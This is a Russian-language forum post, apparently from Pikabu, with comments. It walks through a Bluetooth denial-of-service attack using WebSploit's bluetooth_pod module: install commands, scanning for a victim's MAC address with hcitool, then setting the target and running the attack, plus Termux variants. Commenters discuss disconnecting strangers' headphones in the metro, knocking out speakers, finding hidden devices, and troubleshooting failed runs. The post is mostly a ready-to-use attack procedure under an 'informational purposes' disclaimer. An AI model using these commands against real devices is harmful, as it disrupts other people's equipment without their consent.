Bluetooth dos (ping of death) attack.

Вся информация представлена в ознакомительных целях и автор не несет ответственности за ваши действия.

Сегодня речь пойдет о такой интересной теме как рызрыв соединения bluetooth.
К сожалению информации о том как оборвать соединение bluetooth довольно мало, а приложений которые бы делали это сами я не нашел, поэтому это нужно делать из под операционной системы Kali linux, как ее установить полно информации.

Итак начнем, для начала нужно открыть терминал, работать будем с websploit (можно и через wifite, но существеннрй разницы нет), чтобы установить websploit необходимо ввести следующие команды:
Установка зависимостей

sudo apt-get install scapy

Загрузка архива

wget http://downloads.sourceforge.net/project/websploit/WebSploit...

Распаковка архива

tar xzf WebSploit\ Framework\ V.X.X.X.tar.gz

Перейти в каталог

cd Easy\ Install

Запускаем скрипт установки

sudo ./install.sh

Ждем
После этого в терминале введите:

websploit

Появится похожая штука, значит все сделано правильно.

Теперь вводим командy:

use bluetooth/bluetooth_pod

Этой командой мы задаем адрес атакуемого.

set bdaddr 00:00:00:00:00:00

Вместо нулей адрес жертвы.
Узнать его можно как в самом терминале так и приложением с телефона, в терминале сканируем так:
Велючаем bluetooth

hciconfig hci0 up

Сканируем

hcitool scan

Далее появится список устройств с их мак адресами, этот адрес забиваем вместо 00:00:00:00:00:00.
Затем вводим

run

Начинается атака, bluetooth соединение должно оборваться.
Кому интересно попробуйте сделать тоже самое, но с помощью termux на телефоне, к сожалению у меня какие-то проблемы с bluetooth, поэтому провести атаку не получается.
Вот команды для termux:

$ apt install python2

$ pip2 install scapy

$ git clone https://github.com/The404Hacking/websploit.git

$ cd websploit

$ chmod 777 * websploit.py

$ python2 websploit.py

Всем спасибо за внимание)

DELETED
Автор поста оценил этот комментарий

Профит то какой? Беспроводные уши в метро отключать? А если видимость отключена?

раскрыть ветку (1)
8
Утилита RedFang обнаружит скрытые устройства путем перебора мак адресов, это уже особенности сканирования, дешёвые колонки не обладают возможностью скрываться.
показать ответы

@moderator, тут немножко вредные действия, неадекватов в сети хватает...

раскрыть ветку (1)
8
Вот ты жопа...
показать ответы
5
У меня есть вопрос. Дудосить колонки можно только из-под линукса? Нет ли метода для винды?Или, ещё лучше, из-под андроида?
раскрыть ветку (1)
4
Есть KaliNetHunter для телефона, она устанавливается поверх основной ОС, а есть приложение-терминал termux, я ставил на него вебсплоит и пробовал произвести атаку на свои наушники, у меня не вышло, поэтому я планирую поставить NetHunter и попробовать с него, также можно гасить соединение со старенького кнопочного самсунга с приложухой на яве, но об этом в другой раз, это все известные мне способы, есть еще один человек, на ютубе его ник overbafer1, много роликов по кибербезопасности.
показать ответы
7
Смотрю пикабу сжал ссылку, вот полный туториал по установке:
http://darcade.de/linux/websploit-tutorial
показать ответы
1

Эм не работает бесконечная надпись типо блютуз смерть стартаёт

раскрыть ветку (1)
1
Привет, с того момента довольно много времени прошло, в Termux отсутствует поддержка bluetooth, это делает команды для termux неактуальными.
0

Как я поняла с помощью кали линукс можно взломать любое беспроводное устройство https://codeby.net/threads/kak-vzlomat-bluetooth-chast-1-ter... Правильно?

раскрыть ветку (1)
0

Kali linux это дистрибутив напичканный программным обеспечением для тестирования различных информационных систем на безопасность (может быть использован и для взлома, что противозаконно).

1

И в термуксе не работает блюпуп, в апи термукса нет поддержки блюпупа. от этого многие страдают

раскрыть ветку (1)
0
Есть еще один вариант это использование вот такого вот микрокомпьютера, на него накатить образ кали и уже на кали через терминал установить вебсплоит, хотя он уже должен там стоять. Для разрыва соединения нужно знать мак адрес атакуемого, имя блютуз это вроде hci0 или другой командой show options можно чекнуть настройки скрипта.
Иллюстрация к комментарию
0

хай, слушай, вопрос, из вопросов попробовал я websploit атаку на БТ, после ввода run нифига не происходит. Есть видео, че там должно происходить? А то сцука все робит и тд, на трех уже своих телефонах попробовал

раскрыть ветку (1)
0
С какого устройства была атака? Ввели ли вы мак адрес атакуемого? И самое главное это нужно указать сам блютуз hci0 в параметах скрипта.Прошу прощения за долгий ответ, был забанен на 2 недели.
показать ответы